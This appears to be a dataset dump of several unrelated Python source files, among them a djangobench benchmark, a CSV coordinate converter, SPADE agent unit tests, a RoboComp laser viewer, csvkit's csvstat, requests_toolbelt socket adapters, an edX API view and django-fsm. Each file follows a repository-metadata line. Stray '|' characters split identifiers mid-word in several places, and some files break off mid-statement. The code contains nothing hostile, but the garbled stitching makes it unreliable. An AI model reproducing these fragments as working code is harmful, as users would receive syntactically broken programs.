getdd123(xs,fxs,3)
def p14():
xs = [0, .25,.5,.75]
fxs = [1, 2, 3.5, 6]
getdd123(xs,fxs, | 3)
|
alex/djangobench | djangobench/benchmarks/query_latest/benchmark.py | Python | bsd-3-clause | 241 | 0.016598 | from djangobench.utils import run_benchmark
from query_latest.models import Book
def benchmark():
Book.objects.latest()
run_benchmark(
benchmark,
meta = | {
'description': 'A si | mple Model.objects.latest() call.',
}
)
|
MTgeophysics/mtpy | legacy/csvutm.py | Python | gpl-3.0 | 3,718 | 0.000807 | #!/usr/bin/env python
'''Convert and add columns for different coordinate systems to a CSV file.
This script requires pyproj installed. If you have a CSV file with two columns
containing x and y coordinates in some coordinate system (the "from" system),
this script will add another two columns with the coordinates transformed into
another system (the "to" system). The CSV file must have a header row, and
the column names should be specified on the command line as well.
The coordinate systems are defined by their EPSG codes. Geographic coordinates
(decimal degrees) on the WGS-84 datum are code 4326. There is a code for
every system imaginable: see a searchable list at
http://spatialreference.org/ref/epsg/
'''
# Standard library packages
import argparse
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Third-party packages
import csv
import pyproj
def main():
parser = get_parser()
args = parser.parse_args(sys.argv[1:])
with open(args.in_csv_filename[0], mode='r') as f:
csv_txt = f.read()
out_file = open(args.out_csv_filename[0], mode='wb')
csvutm(csv_txt, out_file, delimiter=args.delimiter,
f=args.from_coords, fx=args.fx, fy=args.fy,
t=args.to, tx=args.tx, ty=args.ty)
def csvutm(csvtxt, out_file, delimiter=',',
f='28353', fx='easting', fy='northing',
t='4326', tx='lon', ty='lon'):
"""
...
"""
f_in = StringIO.StringIO(csvtxt)
r = csv.DictReader(f_in, delimiter=delimiter)
for key in (fx, fy):
try:
assert key in r.fieldnames
except AssertionError:
print('Did not find %s in CSV file.' % key)
raise
fxs = []
fys = []
for i, row in enumerate(r):
fxs.append(float(row[fx]))
fys.append(float(row[fy]))
p1 = pyproj.Proj(init='epsg:%s' % f)
p2 = pyproj.Proj(init='epsg:%s' % t)
txs, tys = pyproj.transform(p1, p2, fxs, fys)
f_in.seek(0)
r = csv.DictReader(f_in, delimiter=delimiter)
fnames = r. | fieldnames
if tx not in fnames:
fnames += [tx]
if ty not in fnames:
fnames += [ty]
w = csv.DictWriter(out_file, fieldnames=fnames, delimiter=delimiter)
w.writeheader()
for i, row in enumerate(r):
row[tx] = txs[i]
row[ty] = tys[i]
w.writerow(row)
def get_parser():
"""
...
"""
parser = argparse.ArgumentParser(description=__d | oc__.split('\n')[0],
epilog=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--fx',
default='lon',
help='column header for x coord of 1st (from) coord system')
parser.add_argument(
'--fy',
default='lat',
help='column header for y coord of 1st (from) coord system')
parser.add_argument(
'--tx',
default='easting',
help='column header for x coord of 2nd (to) coord system')
parser.add_argument(
'--ty',
default='northing',
help='column header for y coord of 2nd (to) coord system')
parser.add_argument('-f', '--from', help='EPSG code for coordinate system to convert from.\n'
'See http://spatialreference.org/ref/epsg/', default='4326', dest='from_coords')
parser.add_argument(
'-t',
'--to',
help='EPSG code for coordinate system to convert into.',
default='28353')
parser.add_argument('-d', '--delimiter', default=',')
parser.add_argument('in_csv_filename', nargs=1)
parser.add_argument('out_csv_filename', nargs=1)
return parser
if __name__ == '__main__':
main()
|
exic/spade2 | examples/unittests/dadTestCase.py | Python | lgpl-2.1 | 14,968 | 0.012427 | import os
import sys
import time
import unittest
sys.path.append('../..')
import spade
import xmpp
import xml.dom.minidom
def CreateSD(s=""):
sd = spade.DF.ServiceDescription()
sd.setName("servicename1"+s)
sd.setType("type1"+s)
sd.addProtocol("sdprotocol1"+s)
sd.addOntologies("sdontology1"+s)
sd.addLanguage("sdlanguage1"+s)
sd.setOwnership("agent1"+s)
sd.addProperty("P","valueP"+s)
sd.addProperty("Q","valueQ"+s)
return sd
def CreateDAD(s=""):
dad = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidname"+s)
dad.setAID(aid)
dad.addProtocol("protocol1"+s)
dad.addOntologies("ontology1"+s)
dad.addLanguage("language1"+s)
dad.setLeaseTime(1000)
dad.addScope("scope1"+s)
return dad
def CreateCO(s=""):
co = spade.content.ContentObject()
co["name"] = spade.AID.aid(name="aidname"+s).asContentObject()
co["lease-time"] = 1000
co["protocols"] = ["protocol1"+s,"sdprotocol1"+s]
co["ontologies"] = ["ontology1"+s,"sdontology1"+s]
co["languages"] = ["language1"+s, "sdlanguage1"+s]
co["scope"] = "scope1"+s
sdco = spade.content.ContentObject()
sdco["name"] = "servicename1"+s
sdco["type"] = "type1"+s
sdco["protocols"] = ["sdprotocol1"+s]
sdco["languages"] = ["sdlanguage1"+s]
sdco["ontologies"] = ["sdontology1"+s]
sdco["ownership"] = "agent1"+s
sdco["properties"] = spade.content.ContentObject()
sdco["properties"]["P"] = "valueP"+s
sdco["properties"]["Q"] = "valueQ"+s
co["services"] = [sdco]
return co
class DadTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testCreateDad(self):
dad = spade.DF.DfAgentDescription()
self.assertEqual(dad.getName(),spade.AID.aid())
self.assertEqual(dad.getServices(),[])
self.assertEqual(dad.getProtocols(),[])
self.assertEqual(dad.getOntologies(),[])
self.assertEqual(dad.getLanguages(),[])
self.assertEqual(dad.getLeaseTime(),None)
self.assertEqual(dad.getScope(),[])
aid = spade.AID.aid()
aid.setName("aidname")
dad.setAID(aid)
self.assertEqual(dad.getName(),"aidname")
dad.addProtocol("protocol1")
self.assertEqual(dad.getProtocols(),["protocol1"])
dad.addOntologies("ontology1")
self.assertEqual(dad.getOntologies(),["ontology1"])
dad.addLanguage("language1")
self.assertEqual(dad.getLanguages(), ["language1"])
dad.setLeaseTime(1000)
self.assertEqual(dad.getLeaseTime(),1000)
dad.addScope("scope1")
self.assertEqual(dad.getScope(),"scope1")
def testAddService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
sd2 = CreateSD("b")
dad.addService(sd1)
self.assertEqual(len(dad.getServices()),1)
self.assertEqual(dad.getServices()[0].getName(),"servicename1a")
self.assertEqual(dad.getProtocols() , ["protocol1","sdprotocol1a"])
self.assertEqual(dad.getLanguages() , ["language1","sdlanguage1a"])
self.assertEqual(dad.getOntologies() , ["ontology1","sdontology1a"])
dad.addService(sd2)
self.assertEqual(len(dad.getServices()),2)
self.failIf(dad.getServices()[0].getName() not in ["servicename1a","servicename1b"])
self.failIf(dad.getServices()[1].getName() not in ["servicename1a","servicename1b"])
self.assertEqual(dad.getProtocols() , ["protocol1","sdprotocol1a","sdprotocol1b"])
self.assertEqual(dad.getLanguages() , ["language1","sdlanguage1a","sdlanguage1b"])
self.assertEqual(dad.getOntologies() , ["ontology1","sdontology1a","sdontology1b"])
def testDelService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
sd2 = CreateSD("b")
dad.addService(sd1)
dad.addService(sd2)
self.assertEqual(len(dad.getServices()),2)
delsd1 = CreateSD("a")
r = dad.delService(delsd1)
self.assertEqual(r,True)
self.assertEqual(len(dad.getServices()),1)
self.failIf(dad.getServices()[0].getName() != "servicename1b")
self.failIf("sdprotocol1a" in dad.getProtocols())
self.failIf("sdlanguage1a" in dad.getLanguages())
self.failIf("sdontology1a" in dad.getOntologies())
delsd2 = CreateSD("b")
dad.delService(delsd2)
self.assertEqual(len(dad.getServices()),0)
self.failIf("sdprotocol1b" in dad.getProtocols())
self.failIf("sdlanguage1b" in dad.getLanguages())
self.failIf("sdontology1b" in dad.getOntologies())
def testUpdateService(self):
dad = CreateDAD()
sd1 = CreateSD("a")
dad.addService(sd1)
sd2 = CreateSD("a")
sd2.setType("updated_type")
r = dad.updateService(sd2)
self.assertEqual(r,True)
self.assertEqual(len(dad.getServices()),1)
self.assertEqual(dad.getServices()[0].getType(),"updated_type")
self.assertEqual(dad.getServices()[0].getName(),"servicename1a")
def testCreateSD(self):
sd = spade.DF.ServiceDescription()
self.assertEqual(sd.getName(),None)
self.assertEqual(sd.getType(),None)
self.assertEqual(sd.getProtocols(),[])
self.assertEqual(sd.getOntologies(),[])
self.assertEqual(sd.getLanguages(),[])
self.assertEqual(sd.getOwnership(),None)
self.assertEqual(sd.getProperties(),{})
sd.setName("servicename1")
self.assertEqual(sd.getName(),"servicename1")
sd.setType("type1")
self.assertEqual(sd.getType(),"type1")
sd.addProtocol("protocol1")
self.assertEqual(sd.getProtocols(),["protocol1"])
sd.addOntologies("ontology1")
self.assertEqual(sd.getOntologies(),["ontology1"])
sd.addLanguage("language1")
self.assertEqual(sd.getLanguages(), ["language1"])
sd.setOwnership("agent1")
self.assertEqual(sd.getOwnership(),"agent1")
sd.addProperty("key1","value1")
self.assertEqual(sd.getProperty("key1"),"value1")
sd.addProperty("key2","value2")
self.assertEqual(sd.getProperty("key2"),"value2")
self.assertEqual(sd.getProperties(),{'key1':'value1','key2':'value2'})
def testMatchSD(self):
sd1 = CreateSD("a")
sd2 = spade.DF.ServiceDescription()
sd2.setName("servicename1a")
self.assertEqual(sd1.match(sd2),True)
sd2.setType("type1a")
self.assertEqual(sd1.match(sd2),True)
sd1.addOntologies("sdontology2a")
sd2.addOntologies("sdontology1a")
self.assertEqual(sd1.match(sd2),True)
sd2.setType("modified_type")
self.assertEqual(sd1.match(sd2),False)
sd2.addOntologies("sdontology3")
self.assertEqual(sd1.match(sd2),False)
def testMatchDAD(self):
dad1 = CreateDAD("a")
dad2 = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidnamea")
dad2.setAID(aid)
self.assertEqual(dad1.match(dad2),True)
dad2.addLanguage("language1a")
self.assertEqual(dad1.match(dad2),True)
dad1.addLanguage("language2a")
self.assertEqual(dad1.match(dad2),True)
dad2.addLanguage("language3a")
self.assertEqual(dad1.match(dad2),False)
dad1 = CreateDAD("a")
dad2 = spade.DF.DfAgentDescription()
aid = spade.AID.aid()
aid.setName("aidnamea")
dad2.setAID(aid)
sd1 = CreateSD("a")
dad1.addService(sd1)
dad2.addService(sd1)
self.assertEqual(dad1.match(dad2),True)
sd2 = CreateSD("b")
dad2.addService(sd2)
self.assertEqual(dad1.match(dad2),False)
dad1.addSe | rvice(sd2)
self.assertEqual(dad1.match(dad2),True)
def testXML(self):
xml1='<name><name>aidname1</name></name><lease- | time>1000</l |
rajathkumarmp/robocomp | tools/rcmonitor/examples/laserViewer.py | Python | gpl-3.0 | 3,144 | 0.024491 | # -*- coding: utf-8 -*-
# Copyright (C) 2010 by RoboLab - University of Extremadura
#
# This file is part of RoboComp
#
# RoboComp is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RoboComp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RoboComp. If not, see <http://www.gnu.org/licenses/>.
#
import Ice, sys, math, traceback
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.Qt import *
class C(QWidget):
def __init__(self, endpoint, modules):
QWidget.__init__(self)
self.ic = Ice.initialize(sys.argv)
self.mods = modules
self.prx = self.ic.stringToProxy(endpoint)
self.proxy = self.mods['RoboCompLaser'].LaserPrx.checkedCast(self.prx)
self.show()
self.label = QLabel('pixel/mm ratio', self)
self.label.move(10, 10)
self.label.show()
self.spinBox = QDoubleSpinBox(self)
self.spinBox.show()
self.spinBox.move(10, 10+self.label.height())
self.spinBox.resize(150, 25)
self.spinBox.setMaximum(1024.)
self.spinBox.setMinimum(0.004)
self.spinBox.setDecimals(6);
self.spinBox.setSingleStep(0.00005)
self.job()
print self.proxy.getLaserConfData()
def job(self):
try:
self.data, basura = self.proxy.getLaserAndBStateData()
print '-----'
m = -1
M = -1
for d in self.data:
if m == -1 or d.dist < m:
m = d.dist
if M == -1 or d.dist > M:
M = d.dist
print len(self.data), ' from', m, 'to', M
except:
print 'No laser connection.'
return None
def measure2coord(self, measure):
const_mul = self.spinBox.value()
x = math.cos(measure.angle-0.5*math.pi)*measure.dist*const_mul+(0.5*self.width())
y = math.sin(measure.angle-0.5*math.pi)*measure.dist*const_mul+(0.5*self.height())
return x, y
def paintEvent(self, event=None):
xOff = self.width()/2.
yOff = self.height()/2.
painter = QPainter(self)
painter.setRenderHint(QPainter.Antialiasing, True)
for point in self.data:
newCoor = self.measure2coord(point)
painter.drawRect(newCoor[0]-1, newCoor[1]-1, 2, | 2)
for wm in range(10):
w = 1000. * (1.+wm) * self.spinBox.value()
painter.drawEllipse(QRectF(0.5*self.width()-w/2., 0.5*self.height()-w/2., w, w))
for wm in range(5):
w = 200. * (1.+wm) * self.spinBox.value()
painter.drawEllipse(QRectF(0.5*self.width()-w/2., 0.5*self.height()-w/2., w, w))
#painter.drawL | ine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width(), 0.5*self.height()+20))
#painter.drawLine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width()+5, 0.5*self.height()+20))
#painter.drawLine(QPoint(0.5*self.width(), 0.5*self.height()), QPoint(0.5*self.width()-5, 0.5*self.height()+20))
painter.end()
painter = None
|
unpingco/csvkit | csvkit/utilities/csvstat.py | Python | mit | 8,673 | 0.007149 | #!/usr/bin/env python
import datetime
from heapq import nlargest
from operator import itemgetter
import math
import six
from csvkit import CSVKitReader, table
from csvkit.cli import CSVKitUtility
NoneType = type(None)
MAX_UNIQUE = 5
MAX_FREQ = 5
OPERATIONS =('min', 'max', 'sum', 'mean', 'median', 'stdev', 'nulls', 'unique', 'freq', 'len')
class CSVStat(CSVKitUtility):
description = 'Print descriptive statistics for each column in a CSV file.'
override_flags = ['l']
def add_arguments(self):
self.argparser.add_argument('-y', '--snifflimit', dest='snifflimit', type=int,
help='Limit CSV dialect sniffing to the specified number of bytes. Specify "0" to disable sniffing entirely.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to be examined. Defaults to all columns.')
self.argparser.add_argument('--max', dest='max_only', action='store_true',
help='Only output max.')
self.argparser.add_argument('--min', dest='min_only', action='store_true',
help='Only output min.')
self.argparser.add_argument('--sum', dest='sum_only', action='store_true',
help='Only output sum.')
self.argparser.add_argument('--mean', dest='mean_only', action='store_true',
help='Only output mean.')
self.argparser.add_argument('--median', dest='median_only', action='store_true',
help='Only output median.')
self.argparser.add_argument('--stdev', dest='stdev_only', action='store_true',
help='Only output standard deviation.')
self.argparser.add_argument('--nulls', dest='nulls_only', action='store_true',
help='Only output whether column contains nulls.')
self.argparser.add_argument('--unique', dest='unique_only', action='store_true',
help='Only output unique values.')
self.argparser.add_argument('--freq', dest='freq_only', action='store_true',
help='Only output frequent values.')
self.argparser.add_argument('--len', dest='len_only', action='store_true',
help='Only output max value length.')
self.argparser.add_argument('--count', dest='count_only', action='store_true',
help='Only output row count')
def main(self):
operations = [op for op in OPERATIONS if getattr(self.args, op + '_only')]
if len(operations) > 1:
self.argparser.error('Only one statistic argument may be specified (mean, median, etc).')
if operations and self.args.count_only:
self.argparser.error('You may not specify --count and a statistical argument at the same time.')
if self.args.count_only:
count = len(list(CSVKitReader(self.input_file)))
if not self.args.no_header_row:
count -= 1
self.output_file.write('Row count: %i\n' % count)
return
tab = table.Table.from_csv(
self.input_file,
snifflimit=self.args.snifflimit,
column_ids=self.args.columns,
zero_based=self.args.zero_based,
no_header_row=self.args.no_header_row,
**self.reader_kwargs
)
for c in tab:
values = sorted(filter(lambda i: i is not None, c))
stats = {}
# Output a single stat
if len(operations) == 1:
op = operations[0]
stat = getattr(self, 'get_%s' % op)(c, values, {})
# Formatting
if op == 'unique':
stat = len(stat)
elif op == 'freq':
stat = ', '.join([('"%s": %s' % (six.text_type(k), count)) for k, count in stat])
stat = '{ %s }' % stat
if len(tab) == 1:
self.output_file.write(six.text_ty | pe(stat))
else:
sel | f.output_file.write('%3i. %s: %s\n' % (c.order + 1, c.name, stat))
# Output all stats
else:
for op in OPERATIONS:
stats[op] = getattr(self, 'get_%s' % op)(c, values, stats)
self.output_file.write(('%3i. %s\n' % (c.order + 1, c.name)))
if c.type == None:
self.output_file.write('\tEmpty column\n')
continue
self.output_file.write('\t%s\n' % c.type)
self.output_file.write('\tNulls: %s\n' % stats['nulls'])
if len(stats['unique']) <= MAX_UNIQUE and c.type is not bool:
uniques = [six.text_type(u) for u in list(stats['unique'])]
data = u'\tValues: %s\n' % ', '.join(uniques)
self.output_file.write(data)
else:
if c.type not in [six.text_type, bool]:
self.output_file.write('\tMin: %s\n' % stats['min'])
self.output_file.write('\tMax: %s\n' % stats['max'])
if c.type in [int, float]:
self.output_file.write('\tSum: %s\n' % stats['sum'])
self.output_file.write('\tMean: %s\n' % stats['mean'])
self.output_file.write('\tMedian: %s\n' % stats['median'])
self.output_file.write('\tStandard Deviation: %s\n' % stats['stdev'])
self.output_file.write('\tUnique values: %i\n' % len(stats['unique']))
if len(stats['unique']) != len(values):
self.output_file.write('\t%i most frequent values:\n' % MAX_FREQ)
for value, count in stats['freq']:
self.output_file.write(('\t\t%s:\t%s\n' % (six.text_type(value), count)))
if c.type == six.text_type:
self.output_file.write('\tMax length: %i\n' % stats['len'])
if not operations:
self.output_file.write('\n')
self.output_file.write('Row count: %s\n' % tab.count_rows())
def get_min(self, c, values, stats):
if c.type == NoneType:
return None
v = min(values)
if v in [datetime.datetime, datetime.date, datetime.time]:
return v.isoformat()
return v
def get_max(self, c, values, stats):
if c.type == NoneType:
return None
v = max(values)
if v in [datetime.datetime, datetime.date, datetime.time]:
return v.isoformat()
return v
def get_sum(self, c, values, stats):
if c.type not in [int, float]:
return None
return sum(values)
def get_mean(self, c, values, stats):
if c.type not in [int, float]:
return None
if 'sum' not in stats:
stats['sum'] = self.get_sum(c, values, stats)
return float(stats['sum']) / len(values)
def get_median(self, c, values, stats):
if c.type not in [int, float]:
return None
return median(values)
def get_stdev(self, c, values, stats):
if c.type not in [int, float]:
return None
if 'mean' not in stats:
stats['mean'] = self.get_mean(c, values, stats)
return math.sqrt(sum(math.pow(v - stats['mean'], 2) for v in values) / len(values))
def get_nulls(self, c, values, stats):
return c.has_nulls()
def get_unique(self, c, values, stats):
return set(values)
def get_freq(self, c, values, stats):
return freq(values)
def get_len(self, c, values, stats):
if c.type != six.text_type:
return None
return c.max_length()
def median(l):
"""
Compute the median of a list.
"""
length = len(l)
if length % 2 == 1:
return l[(length + 1) // 2 - 1]
else:
a = l[(length // 2) - 1]
b = l[length // 2]
return (float(a + b)) / 2
def freq(l, n=MAX_FREQ):
"""
Count the number of times e |
catapult-project/catapult | third_party/requests_toolbelt/requests_toolbelt/adapters/socket_options.py | Python | bsd-3-clause | 4,789 | 0 | # -*- coding: utf-8 -*-
"""The implementation of the SocketOptionsAdapter."""
import socket
import warnings
import sys
import requests
from requests import adapters
from .._compat import connection
from .._compat import poolmanager
from .. import exceptions as exc
class SocketOptionsAdapter(adapters.HTTPAdapter):
"""An adapter for requests that allows users to specify socket options.
Since version 2.4.0 of requests, it is possible to specify a custom list
of socket options that need to be set before establishing the connection.
Example usage::
>>> import socket
>>> import requests
>>> from requests_toolbelt.adapters import socket_options
>>> s = requests.Session()
>>> opts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)]
>>> adapter = socket_options.SocketOptionsAdapter(socket_options=opts)
>>> s.mount('http://', adapter)
You can also take advantage of the list of default options on this class
to keep using the original options in addition to your custom options. In
that case, ``opts`` might look like::
>>> opts = socket_options.SocketOptionsAdapter.default_options + opts
"""
if connection is not None:
default_options = getattr(
connection.HTTPConnection,
'default_socket_options',
[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
)
else:
default_options = []
warnings.warn(exc.RequestsVersionTooOld,
"This version of Requests is only compatible with a "
"version of urllib3 which is too old to support "
"setting options on a socket. This adapter is "
"functionally useless.")
def __init__(self, **kwargs):
self.socket_options = kwargs.pop('socket_options',
self.default_options)
super(SocketOptionsAdapter, self).__init__(**kwargs)
def init_poolmanager(self, connections, maxsize, block=False):
if requests.__build__ >= 0x020400:
# NOTE(Ian): Perhaps we should raise a warning
self.poolmanager = poolmanager.PoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
socket_options=self.socket_options
)
else:
super(SocketOptionsAdapter, self).init_poolmanager(
connections, maxsize, block
)
class TCPKeepAliveAdapter(SocketOptionsAdapter):
"""An adapter for requests that turns on TCP Keep-Alive by default.
The adapter sets 4 socket options:
- ``SOL_SOCKET`` ``SO_KEEPALIVE`` - This turns on TCP Keep-Alive
- ``IPPROTO_TCP`` ``TCP_KEEPINTVL`` 20 - Sets the keep alive interval
- ``IPPROTO_TCP`` ``TCP_KEEPCNT`` 5 - Sets the number of keep alive probes
- ``IPPROTO_TCP`` ``TCP_KEEPIDLE`` 60 - Sets the keep alive time if the
socket library has the ``TCP_KEEPIDLE`` constant
The latter three can be overridden by keyword arguments (respectively):
- ``idle``
- ``interval``
- ``count``
You can use this adapter like so::
>>> from requests_toolbelt.adapters import socket_options
>>> tcp = socket_options.TCPKeepAliveAdapter(idle=120, interval=10)
>>> s = requests.Session()
>>> s.mount('http://', tcp)
"""
def __init__(self, **kwargs):
socket_options = kwargs.pop('socket_options',
SocketOptionsAdapter.default_options)
idle = kwargs.pop('idle', 60)
interval = kwargs.pop('interval', 20)
count = kwargs.pop( | 'count', 5)
socket_options = socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
]
# NOTE(Ian): OSX does not have these constants defined, so we
| # set them conditionally.
if getattr(socket, 'TCP_KEEPINTVL', None) is not None:
socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL,
interval)]
elif sys.platform == 'darwin':
# On OSX, TCP_KEEPALIVE from netinet/tcp.h is not exported
# by python's socket module
TCP_KEEPALIVE = getattr(socket, 'TCP_KEEPALIVE', 0x10)
socket_options += [(socket.IPPROTO_TCP, TCP_KEEPALIVE, interval)]
if getattr(socket, 'TCP_KEEPCNT', None) is not None:
socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, count)]
if getattr(socket, 'TCP_KEEPIDLE', None) is not None:
socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)]
super(TCPKeepAliveAdapter, self).__init__(
socket_options=socket_options, **kwargs
)
|
eduNEXT/edx-platform | openedx/core/djangoapps/api_admin/api/v1/views.py | Python | agpl-3.0 | 2,304 | 0.003038 | """
API Views.
"""
from django_filters.rest_framework import DjangoFilterBackend
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.generics import ListAPIView
from openedx.core.lib.api.authentication import BearerAuthentication
from openedx.core.djangoapps.api_admin.api.v1 import serializers as api_access_serializers
from openedx.core.djangoapps.api_admin.models import ApiAccessRequest
from openedx.core.djangoapps.api_admin.api.filters import IsOwnerOrStaffFilterBackend
class ApiAccessRequestView(ListAPIView):
"""
Return `API Access Requests` in the form of a paginated list.
Raises:
NotFound: Raised if user with `username` provided in `GET` parameters does not exist.
PermissionDenied: Raised if `username` is provided in `GET` parameters but the requesting
user does not have access rights to filter results.
Example:
`GET: /api-admin/api/v1/api_access_request/`
{
"count": 1,
"num_pages": 1,
"current_page": 1,
"results": [
{
"id": 1,
"created": "2017-09-25T08:41:48.934364Z",
"modified": "2017-09-25T08:42:04.185209Z",
"user": 6,
"status": "denied",
"website": "https://www.example.com/",
"reason": "Example",
"company_name": "Example Name",
"company_address": "Silicon Valley",
"site": 1,
"conta | cted | ": true
}
],
"next": null,
"start": 0,
"previous": null
}
"""
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticated, )
serializer_class = api_access_serializers.ApiAccessRequestSerializer
filter_backends = (IsOwnerOrStaffFilterBackend, DjangoFilterBackend)
queryset = ApiAccessRequest.objects.all()
filterset_fields = ('user__username', 'status', 'company_name', 'site__domain', 'contacted')
|
WW-Digital/django-activity-stream | example_project/testapp/streams.py | Python | bsd-3-clause | 444 | 0.004505 | from datetime import datetime
from django.contrib.contenttypes.models import ContentType
from actstream.manager | s import ActionManager, stream
class MyActionManager(ActionManager):
@stream
def testfoo(self, object, time=None):
if time is None:
time = datetime.now()
return object.actor_actions.filter(timestamp__lte = time)
@stream
def testbar | (self, verb):
return self.filter(verb=verb)
|
deis/django-fsm | django_fsm/__init__.py | Python | mit | 9,452 | 0.001375 | # -*- coding: utf-8 -*-
"""
State tracking functionality for django models
"""
import inspect
from collections import namedtuple
from functools import wraps
from django.db import models
from django.db.models.signals import class_prepared
from django.utils.functional import curry
from django_fsm.signals import pre_transition, post_transition
__all__ = ["TransitionNotAllowed", "FSMFieldMixin", "FSMField",
'FSMIntegerField', 'FSMKeyField', 'transition', 'can_proceed']
# South support; see http://south.aeracode.org/docs/tutorial/part4.html#simple-inheritance
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], [r"^django_fsm\.FSMField"])
add_introspection_rules([], [r"^django_fsm\.FSMIntegerField"])
add_introspection_rules([], [r"^django_fsm\.FSMKeyField"])
class TransitionNotAllowed(Exception):
"""Raise when a transition is not allowed"""
Transition = namedtuple('Transition', ['name', 'source', 'target', 'conditions', 'method'])
def get_available_FIELD_transitions(instance, field):
curr_state = field.get_state(instance)
transitions = field.transitions[instance.__class__]
for name, transition in transitions.items():
meta = transition._django_fsm
for stat | e in [curr_state, '*']:
if state in meta.transitions:
target, conditions = meta.transitions[state]
if all(map(lambda condition: condition(instance), conditions)):
yield Transition(
name=name,
source=state,
targ | et=target,
conditions=conditions,
method=transition)
def get_all_FIELD_transitions(instance, field):
return field.get_all_transitions(instance.__class__)
class FSMMeta(object):
"""
Models methods transitions meta information
"""
def __init__(self, field, method):
self.field = field
self.transitions = {} # source -> (target, conditions)
def add_transition(self, source, target, conditions=[]):
if source in self.transitions:
raise AssertionError('Duplicate transition for {} state'.format(source))
self.transitions[source] = (target, conditions)
def has_transition(self, state):
"""
Lookup if any transition exists from current model state using current method
"""
return state in self.transitions or '*' in self.transitions
def conditions_met(self, instance, state):
"""
Check if all conditions have been met
"""
_, conditions = self.transitions.get(state, (None, []))
if not conditions:
_, conditions = self.transitions.get('*', (None, []))
return all(map(lambda condition: condition(instance), conditions))
def next_state(self, current_state):
try:
return self.transitions[current_state][0]
except KeyError:
return self.transitions['*'][0]
class FSMFieldDescriptor(object):
def __init__(self, field):
self.field = field
def __get__(self, instance, type=None):
if instance is None:
raise AttributeError('Can only be accessed via an instance.')
return self.field.get_state(instance)
def __set__(self, instance, value):
if self.field.protected and self.field.name in instance.__dict__:
raise AttributeError('Direct {} modification is not allowed'.format(self.field.name))
self.field.set_state(instance, value)
class FSMFieldMixin(object):
descriptor_class = FSMFieldDescriptor
def __init__(self, *args, **kwargs):
self.protected = kwargs.pop('protected', False)
self.transitions = {} # cls -> (transitions name -> method)
super(FSMFieldMixin, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(FSMFieldMixin, self).deconstruct()
if self.protected:
kwargs['protected'] = self.protected
return name, path, args, kwargs
def get_state(self, instance):
return instance.__dict__[self.name]
def set_state(self, instance, state):
instance.__dict__[self.name] = state
def change_state(self, instance, method, *args, **kwargs):
meta = method._django_fsm
method_name = method.__name__
current_state = self.get_state(instance)
if not (meta.has_transition(current_state) and meta.conditions_met(instance, current_state)):
raise TransitionNotAllowed(
"Can't switch from state '{}' using method '{}'".format(current_state, method_name))
next_state = meta.next_state(current_state)
signal_kwargs = {
'sender': instance.__class__,
'instance': instance,
'name': method_name,
'source': current_state,
'target': next_state
}
pre_transition.send(**signal_kwargs)
result = method(instance, *args, **kwargs)
if next_state:
self.set_state(instance, next_state)
post_transition.send(**signal_kwargs)
return result
def get_all_transitions(self, instance_cls):
"""
Returns [(source, target, name, method)] for all field transitions
"""
transitions = self.transitions[instance_cls]
for name, transition in transitions.items():
meta = transition._django_fsm
for source, (target, conditions) in meta.transitions.items():
yield Transition(
name=name,
source=source,
target=target,
conditions=conditions,
method=transition)
def contribute_to_class(self, cls, name, virtual_only=False):
self.base_cls = cls
super(FSMFieldMixin, self).contribute_to_class(cls, name, virtual_only=virtual_only)
setattr(cls, self.name, self.descriptor_class(self))
setattr(cls, 'get_available_{}_transitions'.format(self.name),
curry(get_available_FIELD_transitions, field=self))
setattr(cls, 'get_all_{}_transitions'.format(self.name),
curry(get_all_FIELD_transitions, field=self))
class_prepared.connect(self._collect_transitions)
def _collect_transitions(self, *args, **kwargs):
sender = kwargs['sender']
if not issubclass(sender, self.base_cls):
return
def is_field_transition_method(attr):
return (inspect.ismethod(attr) or inspect.isfunction(attr)) \
and hasattr(attr, '_django_fsm') \
and attr._django_fsm.field in [self, self.name]
sender_transitions = {}
transitions = inspect.getmembers(sender, predicate=is_field_transition_method)
for method_name, method in transitions:
method._django_fsm.field = self
sender_transitions[method_name] = method
self.transitions[sender] = sender_transitions
class FSMField(FSMFieldMixin, models.CharField):
"""
State Machine support for Django model as CharField
"""
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 50)
super(FSMField, self).__init__(*args, **kwargs)
class FSMIntegerField(FSMFieldMixin, models.IntegerField):
"""
Same as FSMField, but stores the state value in an IntegerField.
db_index is True by default.
"""
def __init__(self, *args, **kwargs):
kwargs.setdefault('db_index', True)
super(FSMIntegerField, self).__init__(*args, **kwargs)
class FSMKeyField(FSMFieldMixin, models.ForeignKey):
"""
State Machine support for Django model
"""
def get_state(self, instance):
return instance.__dict__[self.attname]
def set_state(self, instance, state):
instance.__dict__[self.attname] = self.to_python(state)
